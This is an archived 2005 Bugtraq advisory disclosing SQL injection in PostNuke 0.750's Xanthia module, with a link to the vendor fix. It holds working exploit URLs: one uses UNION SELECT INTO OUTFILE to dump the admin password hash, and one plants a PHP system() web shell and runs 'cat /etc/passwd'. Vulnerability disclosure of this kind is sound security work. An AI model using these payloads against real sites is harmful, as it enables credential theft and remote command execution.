lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 21 May 2005 07:59:04 -0000
From: Maksymilian Arciemowicz <max@...tsuper.pl>
To: bugtraq@...urityfocus.com
Subject: [SECURITYREASON.COM] PostNuke SQL Injection 0.750=>x




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke SQL Injection 0.750=>x cXIb8O3.5]

Author: cXIb8O3
Date: 2.3.2005
from SecurityReason.Com

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

- --- 1. Sql Injection ---
This sql injection exist in modules/Xanthia/pnclasses/Xanthia.php on line 977 on function init_template()

Vulnerabilities code:
- -965-980---
				$sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate,
								$blcontrolcolumn[identi] as identi
								FROM $pntable[theme_blcontrol]
								WHERE $blcontrolcolumn[theme]='$theme'
								AND $blcontrolcolumn[module]='$mod'
								AND $blcontrolcolumn[blocktemplate] !=''";
	
				// Execute the query
				$result =& $dbconn->Execute($sql);
	
				$blocktemplates = array();
				while(!$result->EOF) {
					$row = $result->GetRowAssoc(false);
					$blocktemplates[] = $row;
					$result->MoveNext();
				}
- -965-980---

Error exists in varible $mod =>(GET) name.
But you don't can see result..

Error:
If you are user right and have you function init_template() active go to:

http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index

Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------

OR 

http://[HOST]/[DIR]/modules.php?op=modload&name=sp3x&file=index&module='cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function MoveNext() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------

Ok. Frist exploit.


Exploit 0[GET Admin Pass]
Chech dir for PostNuke. 

http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index

Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------

For exemple prefix is /www/PostNuke-0.750/source/html/. 
Now you can make exploit. But you have to know db prefix.

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view

and error messege is:

Error message :
- ---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")
- ---------------

But go now to 

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3

and have you password for user with id=2.


Exploit1[Blind upload]
Go to:

http://[HOST]/[DIR]/user.php?op=edituser

and insert to "Extra information" php code. For exemeple:

- ---
<?php system($_GET[cXIb8O3]); ?>
- ---

And now you can make php script with this code. For exemple:

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view

and go to:

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd

- --- 2. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 3. Greets ---

sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://securityreason.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCjunXznmvyJCR4zQRAjFkAJ4lDoD/zYP3lFZD07XsR9WyftT7vACgjRPr
oAXlzjom7BH7yzDRybeHjDM=
=RlgM
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ